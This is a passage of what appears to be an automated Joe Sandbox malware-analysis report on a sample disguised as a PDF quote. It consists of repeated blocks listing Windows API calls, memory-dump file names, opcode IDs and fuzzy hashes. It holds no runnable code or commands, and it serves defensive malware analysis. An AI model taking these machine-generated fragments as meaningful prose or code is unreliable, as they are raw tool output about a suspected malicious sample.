                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                    • String ID:
                                                                    • API String ID: 48991266-0
                                                                    • Opcode ID: b22c7d8d106e4c9691d4f57097c2efc6ba0930367f7e4b49c7726be4caab33b6
                                                                    • Instruction ID: c109ea55fbed8554bd0f60dd91041979c0982c023368dccefc347ac35f1a526f
                                                                    • Opcode Fuzzy Hash: b22c7d8d106e4c9691d4f57097c2efc6ba0930367f7e4b49c7726be4caab33b6
                                                                    • Instruction Fuzzy Hash: BFF0303A204104ABCF416F55ED85E49BB69EF49320B04C065FE086E22AC731E915CBB4
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EBA179
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EBA18C
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00EBA193
                                                                    • AttachThreadInput.USER32(00000000), ref: 00EBA19A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: 94f54c27c41a41ad1f1d14617aebabe286fdfb02f006fe2e8e505856ded0b6eb
                                                                    • Instruction ID: 4c4754df0079c945f3c12fd786ec045213724289017225dc306295e0e51d957e
                                                                    • Opcode Fuzzy Hash: 94f54c27c41a41ad1f1d14617aebabe286fdfb02f006fe2e8e505856ded0b6eb
                                                                    • Instruction Fuzzy Hash: BCE015B154226CBBDB211BA2EC4CED73F1CEB267A1F048024F509A80A0C67185448BE0
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 00E62231
                                                                    • SetTextColor.GDI32(?,000000FF), ref: 00E6223B
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00E62250
                                                                    • GetStockObject.GDI32(00000005), ref: 00E62258
                                                                    • GetWindowDC.USER32(?,00000000), ref: 00E9C003
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E9C010
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00E9C029
                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00E9C042
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00E9C062
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00E9C06D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1946975507-0
                                                                    • Opcode ID: 84b2a843f4e23e370a158e30300f26f5c95d3d59cda3472c9a670884f5b5353b
                                                                    • Instruction ID: d5b606608c4300bf9f210e880e495d2c9fcd2791acde100418b38fb5dfda66f4
                                                                    • Opcode Fuzzy Hash: 84b2a843f4e23e370a158e30300f26f5c95d3d59cda3472c9a670884f5b5353b
                                                                    • Instruction Fuzzy Hash: FEE06531500188EEEF215FB5FC4D7D83B20EB55336F108366FA696C0E187714A98DB11
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 00EB8A43
                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00EB860E), ref: 00EB8A4A
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EB860E), ref: 00EB8A57
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00EB860E), ref: 00EB8A5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3974789173-0
                                                                    • Opcode ID: cb1882e89d5d7a0e7bbb31e1d72be3ccbb5bd671af0e701f391f9c6dff828456
                                                                    • Instruction ID: a788943c5ed2ca4bd1000a6fb755327f1d99c37aac5b04e3375ad60eb1027086
                                                                    • Opcode Fuzzy Hash: cb1882e89d5d7a0e7bbb31e1d72be3ccbb5bd671af0e701f391f9c6dff828456
                                                                    • Instruction Fuzzy Hash: EEE02632602210DFD7605FF26D0CB873BACEF50792F004828F245ED040DA308549C710
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00EA20B6
                                                                    • GetDC.USER32(00000000), ref: 00EA20C0
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EA20E0
                                                                    • ReleaseDC.USER32(?), ref: 00EA2101
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 99dea7e8285464155078056ce3cbcbbe5a5c5533f2bbdba04e52d26c2d516af0
                                                                    • Instruction ID: 5211462f6e717e7f9633e741fae231411a8d605c309793341171c70ad0b35d83
                                                                    • Opcode Fuzzy Hash: 99dea7e8285464155078056ce3cbcbbe5a5c5533f2bbdba04e52d26c2d516af0
                                                                    • Instruction Fuzzy Hash: E2E0E575800209EFDB019FA1D8886AD7FF5EB4C350F11C029F95ABB221CB3891859F80
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00EA20CA
                                                                    • GetDC.USER32(00000000), ref: 00EA20D4
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EA20E0
                                                                    • ReleaseDC.USER32(?), ref: 00EA2101
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 705448bd5a0fdc3baa96906202c70433b9d46f6e86312804ce6b7f7427cee77e
                                                                    • Instruction ID: 79fb3d0e7f8aaab62b8d9f1811cd790b07ac7b0dfdef47d7d4b4e5d75e872352
                                                                    • Opcode Fuzzy Hash: 705448bd5a0fdc3baa96906202c70433b9d46f6e86312804ce6b7f7427cee77e
                                                                    • Instruction Fuzzy Hash: 77E0E575800209AFDB019FB1D84869D7BE5AB4C350F108025F95AAB220CB3891459F80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %
                                                                    • API String ID: 0-2291192146
                                                                    • Opcode ID: 71a8dd04116c79d3319fb8e5edc3bb8e616c376a3fa899f81a620201a2d02e87
                                                                    • Instruction ID: 3a2eb670c8300dc63371b43927b47ec3edad29774232387119a5bca8afa53ec9
                                                                    • Opcode Fuzzy Hash: 71a8dd04116c79d3319fb8e5edc3bb8e616c376a3fa899f81a620201a2d02e87
                                                                    • Instruction Fuzzy Hash: A7B12971D901099BCF24EF94E8819FEBBB4FF44394F106026E952B7290EB309E81CB51
                                                                    APIs
                                                                      • Part of subcall function 00E7FE06: _wcscpy.LIBCMT ref: 00E7FE29
                                                                      • Part of subcall function 00E69997: __itow.LIBCMT ref: 00E699C2
                                                                      • Part of subcall function 00E69997: __swprintf.LIBCMT ref: 00E69A0C
                                                                    • __wcsnicmp.LIBCMT ref: 00ECB0B9
                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00ECB182
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                    • String ID: LPT
                                                                    • API String ID: 3222508074-1350329615
                                                                    • Opcode ID: c6ef0d9d818e4fed455fc9109a467c8dc4aced05dd9fd488b0f4ad490e374b6a
                                                                    • Instruction ID: 9d4ebd849abaf5421ea6f2041c4b30ea7bf406d29acf1710acb60f8cad497437
                                                                    • Opcode Fuzzy Hash: c6ef0d9d818e4fed455fc9109a467c8dc4aced05dd9fd488b0f4ad490e374b6a
                                                                    • Instruction Fuzzy Hash: 54618D71A00215AFCB18EF94D992FAEB7F4AB48310F14506DF546BB291DB31AE41CB90
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: Oa
                                                                    • API String ID: 4104443479-3945284152
                                                                    • Opcode ID: 2c6fd4b387fba1b7ce957570881a09202d5e6d4ef6739001272cd822cc2de3f2
                                                                    • Instruction ID: 01446ccd0305fb150dc20b6a44853c74dd6c0fb6b78710a346dd0fdab3b172a9
                                                                    • Opcode Fuzzy Hash: 2c6fd4b387fba1b7ce957570881a09202d5e6d4ef6739001272cd822cc2de3f2
                                                                    • Instruction Fuzzy Hash: 1D514DB0A00609DFCF64CF68C580AEEB7F1FF49304F14952AE85AEB250EB31A955CB51
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00E72AC8
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E72AE1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: 5a3b776bb67450af44c7b5b321d8328a329fa869e152f1ab73c60b7064972836
                                                                    • Instruction ID: d45a6cbc5474d3f090907c150342e0b18a045c557be375fd60390dfa90dd7925
                                                                    • Opcode Fuzzy Hash: 5a3b776bb67450af44c7b5b321d8328a329fa869e152f1ab73c60b7064972836
                                                                    • Instruction Fuzzy Hash: 79515A714187489BD320AF50EC85BAFB7ECFF84350F41885DF2D9610A2DB309929CB56
                                                                    APIs
                                                                      • Part of subcall function 00E6506B: __fread_nolock.LIBCMT ref: 00E65089
                                                                    • _wcscmp.LIBCMT ref: 00EC98CD
                                                                    • _wcscmp.LIBCMT ref: 00EC98E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$__fread_nolock
                                                                    • String ID: FILE
                                                                    • API String ID: 4029003684-3121273764
                                                                    • Opcode ID: cee25675ec5d8e25497bb1db1466cfadd5a9a555f6d32da22988624860655236
                                                                    • Instruction ID: 5a7886e012e559abaa2ceafb127c93f595ddb1156f05c362d797ec66e22d69b8
                                                                    • Opcode Fuzzy Hash: cee25675ec5d8e25497bb1db1466cfadd5a9a555f6d32da22988624860655236
                                                                    • Instruction Fuzzy Hash: F8411872A40609BADF209AA4CC8AFEF77FDDF45714F00046EB904B7181DA719D0687A1
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00ED26B4
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00ED26EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_memset
                                                                    • String ID: |
                                                                    • API String ID: 1413715105-2343686810
                                                                    • Opcode ID: 7c1af914e8e01e766435df60387cba9c6c71247e351b9eb5562cf8372a321711
                                                                    • Instruction ID: b4964227f3a93d6a8e98f1582b14de5309f0da3de2d8cd73063ded640cb176c8
                                                                    • Opcode Fuzzy Hash: 7c1af914e8e01e766435df60387cba9c6c71247e351b9eb5562cf8372a321711
                                                                    • Instruction Fuzzy Hash: A3313771800119AFCF15EFA0DC85EEEBFB9FF18354F10106AF918B6266DA315A46DB60
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00EE7B93
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EE7BA8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: ec157be74c4e5a8ba312e8aa25288a95899f6eef37ad76eaa402cc4ea29870c3
                                                                    • Instruction ID: 0aa416b7350bc1b17be4beaa27952e0f063d1f78608bda3b3b50c0d66ee49935
                                                                    • Opcode Fuzzy Hash: ec157be74c4e5a8ba312e8aa25288a95899f6eef37ad76eaa402cc4ea29870c3
                                                                    • Instruction Fuzzy Hash: 95410774A0524E9FDB14CF65D881BDABBB5FB09700F14116AE944EB391D770A941CF90
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00EE6B49
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EE6B85
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    • Opcode ID: 120d9a38edae254cb96bbcd640556cde40993de5434dd6343fedf93145d22b9f
                                                                    • Instruction ID: e1de92133e94c1c570d30799329989c869a31099d255b78c7d66ad534c1a7020
                                                                    • Opcode Fuzzy Hash: 120d9a38edae254cb96bbcd640556cde40993de5434dd6343fedf93145d22b9f
                                                                    • Instruction Fuzzy Hash: 6D31A171100648AEDB10DF65DC81AFB73A9FF98764F10A529F8A9E7190DB30AC41C760
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00EC2C09
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EC2C44
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 0f2d26d5ed8b09144a0f923d5e5b76ed72efcfba455fcfc7ab05a56c64908644
                                                                    • Instruction ID: dfab80874df5db8dcbfe4781a9019dc8f6ab660211d74db804de53d60d7a75dd
                                                                    • Opcode Fuzzy Hash: 0f2d26d5ed8b09144a0f923d5e5b76ed72efcfba455fcfc7ab05a56c64908644
                                                                    • Instruction Fuzzy Hash: 7B31E1316003099FEB34AF58DA85FAEFBF8EF04354F14501DEA85B61A0E7729A46CB10
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EE6793
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EE679E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: a0c0b6fd348b804ef6bcea4112151a7c0cf832151ba8570d2bda97bc4399f445
                                                                    • Instruction ID: b1858eb67d14cc40d22fb31a4d55575d3f2838f22729bf6ee1385e2650f2be33
                                                                    • Opcode Fuzzy Hash: a0c0b6fd348b804ef6bcea4112151a7c0cf832151ba8570d2bda97bc4399f445
                                                                    • Instruction Fuzzy Hash: 6611B27520024D6FEF218F25CC80EFB37AAEB983A8F105126F914AB290E6319C5187A0
                                                                    APIs
                                                                      • Part of subcall function 00E61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E61D73
                                                                      • Part of subcall function 00E61D35: GetStockObject.GDI32(00000011), ref: 00E61D87
                                                                      • Part of subcall function 00E61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E61D91
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00EE6CA3
                                                                    • GetSysColor.USER32(00000012), ref: 00EE6CBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: a3ddb3d6935a985924e96933e5328e52fbcdb78c89b0fe94222d090741f2c0d2
                                                                    • Instruction ID: ee662aad41f8e0c46ff4be6fcf2dc778699409ec285b2474310cd6c06daee74a
                                                                    • Opcode Fuzzy Hash: a3ddb3d6935a985924e96933e5328e52fbcdb78c89b0fe94222d090741f2c0d2
                                                                    • Instruction Fuzzy Hash: 1E21897251020EAFDB04DFA9CC45AFABBB8EB08304F105628F985E2240E731E850DB50
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00EE69D4
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EE69E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
